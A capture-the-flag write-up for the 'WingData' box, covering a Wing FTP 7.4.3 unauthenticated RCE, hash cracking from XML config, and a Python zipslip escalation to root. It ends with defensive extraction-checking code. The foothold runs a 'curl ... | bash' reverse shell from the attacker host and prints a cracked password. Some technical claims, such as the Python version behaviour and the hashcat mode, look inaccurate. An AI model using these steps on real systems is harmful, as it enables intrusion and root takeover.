WingData
Overview
WingData is an easy Linux box running Wing FTP Server 7.4.3 on a subdomain
discovered through the web portal. The version is vulnerable to an unauthenticated
RCE (ExploitDB 52347), landing a shell as the wingftp service user. The server’s
XML configuration files store HMAC-SHA256 password hashes salted with :WingFTP;
cracking them recovers credentials for a local system user. That user’s home directory
contains a backup script run as root that extracts attacker-controlled zip archives —
exploitable via CVE-2025-4138 (Python zipslip in Python 3.12+) to write an
arbitrary file as root.
Path: Wing FTP 7.4.3 RCE → wingftp service shell → hash cracking from XML
config → SSH as local user → zipslip CVE-2025-4138 → root.
Enumeration
A standard nmap scan shows SSH and an Apache web server redirecting to wingdata.htb:
$ nmap -T4 -A 10.129.10.205
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp open http Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://wingdata.htb/

After adding wingdata.htb to /etc/hosts, the web portal’s “Client Portal” button
reveals a subdomain: ftp.wingdata.htb.

Browsing to http://ftp.wingdata.htb shows a Wing FTP Server web interface reporting
version 7.4.3.
Foothold — Wing FTP Server Unauthenticated RCE
Wing FTP Server 7.4.3 is vulnerable to an unauthenticated remote code execution flaw documented at ExploitDB 52347. The public exploit confirms the target is vulnerable and accepts a command to execute:
$ python3 exploit.py -u http://ftp.wingdata.htb
[*] Testing target: http://ftp.wingdata.htb
[+] http://ftp.wingdata.htb is vulnerable!
I hosted a reverse shell script and used the exploit to fetch and execute it:
$ nc -lvnp 8081
$ python3 exploit.py -u http://ftp.wingdata.htb -c 'curl 10.10.16.244:8888/rev.sh | bash'

The shell arrives as wingftp.
User — Cracking Wing FTP Password Hashes
The Wing FTP data directory contains XML configuration files for both admin accounts and regular FTP users:
wingftp@wingdata:/opt/wftpserver/Data$ ls
1 _ADMINISTRATOR bookmark_db settings.xml ssh_host_ecdsa_key ssh_host_key
The admin account config at _ADMINISTRATOR/admins.xml contains a SHA-256 hash:
<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>
The user XML files in Data/1/users/ contain hashes for several accounts — maria,
steve, wacky, john, and anonymous. Wing FTP salts its hashes with :WingFTP
appended to the plaintext before hashing.
Running linpeas confirms the service configuration and helps identify the hash format:


Cracking with the correct salt: hashcat mode 1400 (SHA-256), with the :WingFTP salt string appended to each candidate password before hashing:
$ hashcat -m 1400 -a 0 <hash> /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt --force
One of the user hashes cracks to reveal a password:
!#7Blushing^*Bride5

That password works for SSH access as the corresponding local system user.

The user flag is in that user’s home directory.
Privilege Escalation — CVE-2025-4138 (Python Zipslip)
Exploring the home directory reveals a backup script that extracts zip archives from an uploads or backup staging location into a destination directory:

The script runs as root (via cron or a sudo rule) and uses Python’s zipfile module
to extract archives. Python versions before 3.12 reject path-traversal entries in zip
files by default, but CVE-2025-4138 describes a bypass allowing the extraction
filter to be circumvented even in Python 3.12+, enabling classic zipslip — writing
files outside the extraction target directory.
By crafting a zip archive with a path-traversal entry (e.g., ../../root/.ssh/authorized_keys)
and placing it in the directory the backup script reads from, the next script
execution writes the attacker-controlled content to the traversed path as root.

Dropping an SSH public key into /root/.ssh/authorized_keys via the zipslip completes
the escalation, and ssh root@wingdata.htb with the corresponding private key grants
a root shell.
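The defence that closes this path is a containment check on every archive member before anything is written, done by the script itself rather than trusted to the interpreter's sanitisation. The block below is an added example, not the backup script from the box (whose code is not shown above) and not part of the CVE advisory: it builds a constructed archive carrying a traversal entry of the kind described, shows the paths a naive join would write to, flags the escaping member, and refuses the archive. The function names are mine, and the key material in the sample entry is a placeholder.

```python
import io
import os
import tempfile
import zipfile

# Constructed sample: the traversal entry name is the one discussed above.
TRAVERSAL_NAME = "../../root/.ssh/authorized_keys"


def build_sample_archive(include_traversal: bool = True) -> bytes:
    """In-memory zip with one benign member and, optionally, one escaping member."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("backup/notes.txt", "benign backup content\n")
        if include_traversal:
            zf.writestr(TRAVERSAL_NAME, "ssh-ed25519 PLACEHOLDER-KEY\n")
    return buf.getvalue()


def naive_targets(archive: bytes, dest: str) -> list[str]:
    """Dry run of the vulnerable pattern: member name joined onto dest with no
    check. Returns the paths such a script would open for writing."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return [os.path.normpath(os.path.join(dest, n)) for n in zf.namelist()]


def unsafe_members(archive: bytes, dest: str) -> list[str]:
    """Names whose resolved path escapes dest: '..' components, absolute
    paths, and prefix tricks (dest + 'evil') are all caught by commonpath."""
    root = os.path.realpath(dest)
    escaping = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(root, name))
            if os.path.commonpath([root, target]) != root:
                escaping.append(name)
    return escaping


def safe_extract(archive: bytes, dest: str) -> list[str]:
    """Reject the whole archive if any member escapes; otherwise extract it."""
    bad = unsafe_members(archive, dest)
    if bad:
        raise ValueError(f"refusing to extract; traversal entries: {bad}")
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        zf.extractall(dest)
        return zf.namelist()


def demo() -> dict:
    """Run both archives through the check in a scratch directory."""
    dest = tempfile.mkdtemp(prefix="backup-dest-")
    malicious = build_sample_archive(include_traversal=True)
    benign = build_sample_archive(include_traversal=False)
    result = {
        # Paths the naive join would write outside the destination.
        "naive_escapes": [p for p in naive_targets(malicious, dest)
                          if not p.startswith(dest + os.sep)],
        "flagged": unsafe_members(malicious, dest),
        "rejected": False,
        "extracted": [],
    }
    try:
        safe_extract(malicious, dest)
    except ValueError:
        result["rejected"] = True
    result["extracted"] = safe_extract(benign, dest)
    result["notes_exists"] = os.path.isfile(os.path.join(dest, "backup", "notes.txt"))
    return result


if __name__ == "__main__":
    print(demo())
```

Rejecting the archive outright, rather than skipping the bad member, is deliberate: an archive that contains a traversal entry is hostile, and a root-owned job should stop and log rather than extract the rest. The check resolves paths with realpath and compares with commonpath, so it holds regardless of what filtering the zipfile module applies in a given interpreter version.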
Takeaways
- Wing FTP Server 7.4.3 ships with an unauthenticated RCE that is point-and-shoot with a public PoC — any internet-exposed instance on this version is fully compromised without credentials.
- CVE-2025-4138 demonstrates that zipslip remains relevant even in modern Python: root-owned scripts that extract attacker-controlled archives without safe extraction patterns are a reliable privilege escalation path regardless of Python version.